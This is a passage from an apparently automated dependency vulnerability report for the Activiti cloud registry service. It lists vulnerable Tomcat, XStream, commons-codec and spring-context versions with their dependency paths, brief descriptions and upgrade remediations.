  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-RC1 org.springframework.boot:spring-boot-tomcat@4.1.0-RC1 org.apache.tomcat.embed:tomcat-embed-core@11.0.21

Overview

org.apache.tomcat.embed:tomcat-embed-core is a Core Tomcat implementation.

Affected versions of this package are vulnerable to Improper Handling of Case Sensitivity in the LockOutRealm function. An attacker can bypass account lockout protections by submitting usernames with different letter casing.

Remediation

Upgrade org.apache.tomcat.embed:tomcat-embed-core to version 9.0.118, 10.1.55, 11.0.22 or higher.

References

Improper Handling of Case Sensitivity vulnerability report

medium severity

Insecure XML deserialization

  • Vulnerable module: com.thoughtworks.xstream:xstream
  • Introduced through: org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1

Detailed paths

  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-client-jersey3@2.0.5 com.netflix.eureka:eureka-client@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-client@5.0.1 com.netflix.eureka:eureka-client@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-core@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-client-jersey3@2.0.5 com.netflix.eureka:eureka-client@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-core@2.0.5 com.netflix.eureka:eureka-client@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.

Overview

com.thoughtworks.xstream:xstream is a simple library to serialize objects to XML and back again.

Affected versions of this package are vulnerable to Insecure XML deserialization. It could deserialize arbitrary user-supplied XML content, representing objects of any type. A remote attacker able to pass XML to XStream could use this flaw to perform a variety of attacks, including remote code execution in the context of the server running the XStream application.

Remediation

Upgrade com.thoughtworks.xstream:xstream to version 1.4.7, 1.4.11 or higher.

References

Insecure XML deserialization vulnerability report

low severity

Information Exposure

  • Vulnerable module: commons-codec:commons-codec
  • Introduced through: org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1

Detailed paths

  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-client-jersey3@2.0.5 com.netflix.eureka:eureka-client@2.0.5 org.apache.httpcomponents:httpclient@4.5.3 commons-codec:commons-codec@1.9
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-client@5.0.1 com.netflix.eureka:eureka-client@2.0.5 org.apache.httpcomponents:httpclient@4.5.3 commons-codec:commons-codec@1.9
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-client-jersey3@2.0.5 org.glassfish.jersey.connectors:jersey-apache-connector@3.0.5 org.apache.httpcomponents:httpclient@4.5.3 commons-codec:commons-codec@1.9
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 org.glassfish.jersey.connectors:jersey-apache-connector@3.0.5 org.apache.httpcomponents:httpclient@4.5.3 commons-codec:commons-codec@1.9
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-client-jersey3@2.0.5 com.netflix.eureka:eureka-client@2.0.5 org.apache.httpcomponents:httpclient@4.5.3 commons-codec:commons-codec@1.9
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-core@2.0.5 com.netflix.eureka:eureka-client@2.0.5 org.apache.httpcomponents:httpclient@4.5.3 commons-codec:commons-codec@1.9
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-client-jersey3@2.0.5 org.glassfish.jersey.connectors:jersey-apache-connector@3.0.5 org.apache.httpcomponents:httpclient@4.5.3 commons-codec:commons-codec@1.9
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-core@2.0.5 com.amazonaws:aws-java-sdk-core@1.11.277 org.apache.httpcomponents:httpclient@4.5.3 commons-codec:commons-codec@1.9
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-core@2.0.5 com.amazonaws:aws-java-sdk-autoscaling@1.11.277 com.amazonaws:aws-java-sdk-core@1.11.277 org.apache.httpcomponents:httpclient@4.5.3 commons-codec:commons-codec@1.9
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-core@2.0.5 com.amazonaws:aws-java-sdk-ec2@1.11.277 com.amazonaws:aws-java-sdk-core@1.11.277 org.apache.httpcomponents:httpclient@4.5.3 commons-codec:commons-codec@1.9
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-core@2.0.5 com.amazonaws:aws-java-sdk-route53@1.11.277 com.amazonaws:aws-java-sdk-core@1.11.277 org.apache.httpcomponents:httpclient@4.5.3 commons-codec:commons-codec@1.9
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-core@2.0.5 com.amazonaws:aws-java-sdk-sts@1.11.277 com.amazonaws:aws-java-sdk-core@1.11.277 org.apache.httpcomponents:httpclient@4.5.3 commons-codec:commons-codec@1.9

Overview

commons-codec:commons-codec is a package that contains simple encoder and decoders for various formats such as Base64 and Hexadecimal.

Affected versions of this package are vulnerable to Information Exposure. When there is no byte array value that can be encoded into a string the Base32 implementation does not reject it, and instead decodes it into an arbitrary value which can be re-encoded again using the same implementation. This allows for information exposure exploits such as tunneling additional information via seemingly valid base 32 strings.

Remediation

Upgrade commons-codec:commons-codec to version 1.14 or higher.

References

Information Exposure vulnerability report

low severity

Improper Handling of Case Sensitivity

  • Vulnerable module: org.springframework:spring-context
  • Introduced through: org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1, org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 and others

Detailed paths

  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 org.springframework.boot:spring-boot-health@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 org.springframework:spring-webmvc@7.0.7 org.springframework:spring-context@6.1.10
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.glassfish.hk2:spring-bridge@3.1.1 org.springframework:spring-context@6.1.10
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 org.springframework.boot:spring-boot-actuator-autoconfigure@4.1.0-RC1 org.springframework.boot:spring-boot-actuator@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 org.springframework.boot:spring-boot-actuator-autoconfigure@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 org.springframework.boot:spring-boot-starter@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-jetty@4.1.0-RC1 org.springframework.boot:spring-boot-starter@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-config@5.0.3 org.springframework.cloud:spring-cloud-config-client@5.0.3 org.springframework.boot:spring-boot-autoconfigure@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 org.springframework.boot:spring-boot-starter-micrometer-metrics@4.1.0-RC1 org.springframework.boot:spring-boot-micrometer-metrics@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-jetty@4.1.0-RC1 org.springframework.boot:spring-boot-jetty@4.1.0-RC1 org.springframework.boot:spring-boot-web-server@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-jetty@4.1.0-RC1 org.springframework.boot:spring-boot-starter-jetty-runtime@4.1.0-RC1 org.springframework.boot:spring-boot-web-server@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-starter-jackson@4.1.0-RC1 org.springframework.boot:spring-boot-jackson@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 org.springframework.boot:spring-boot-servlet@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 org.springframework.boot:spring-boot-starter-micrometer-metrics@4.1.0-RC1 org.springframework.boot:spring-boot-starter@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-starter-jackson@4.1.0-RC1 org.springframework.boot:spring-boot-starter@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-config@5.0.3 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.boot:spring-boot-starter@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 org.springframework.boot:spring-boot-starter-micrometer-metrics@4.1.0-RC1 org.springframework.boot:spring-boot-micrometer-metrics@4.1.0-RC1 org.springframework.boot:spring-boot-micrometer-observation@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-jetty@4.1.0-RC1 org.springframework.boot:spring-boot-starter-jetty-runtime@4.1.0-RC1 org.springframework.boot:spring-boot-jetty@4.1.0-RC1 org.springframework.boot:spring-boot-web-server@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-config@5.0.3 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.boot:spring-boot-starter@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 org.springframework.boot:spring-boot-health@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-freemarker@4.0.2 org.springframework.boot:spring-boot-freemarker@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-client@5.0.1 org.springframework.boot:spring-boot-jackson2@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.1 org.springframework.boot:spring-boot-starter-cache@4.0.2 org.springframework.boot:spring-boot-cache@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 org.springframework:spring-webmvc@7.0.7 org.springframework:spring-context@6.1.10
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-freemarker@4.0.2 org.springframework.boot:spring-boot-freemarker@4.0.2 org.springframework:spring-context-support@7.0.3 org.springframework:spring-context@6.1.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.1 org.springframework.boot:spring-boot-starter-cache@4.0.2 org.springframework.boot:spring-boot-cache@4.0.2 org.springframework:spring-context-support@7.0.3 org.springframework:spring-context@6.1.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-config@5.0.3 org.springframework.cloud:spring-cloud-config-client@5.0.3 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.boot:spring-boot-starter@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-config@5.0.3 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-config@5.0.3 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-client@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-config@5.0.3 org.springframework.cloud:spring-cloud-config-client@5.0.3 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 org.springframework.boot:spring-boot-actuator-autoconfigure@4.1.0-RC1 org.springframework.boot:spring-boot-actuator@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 org.springframework.boot:spring-boot-actuator-autoconfigure@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 org.springframework.boot:spring-boot-starter@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.1 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.boot:spring-boot-starter@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-freemarker@4.0.2 org.springframework.boot:spring-boot-starter@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.1 org.springframework.boot:spring-boot-starter-cache@4.0.2 org.springframework.boot:spring-boot-starter@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 org.springframework.boot:spring-boot-starter-micrometer-metrics@4.1.0-RC1 org.springframework.boot:spring-boot-micrometer-metrics@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-starter-jackson@4.1.0-RC1 org.springframework.boot:spring-boot-jackson@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 org.springframework.boot:spring-boot-servlet@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-client@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.1 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10
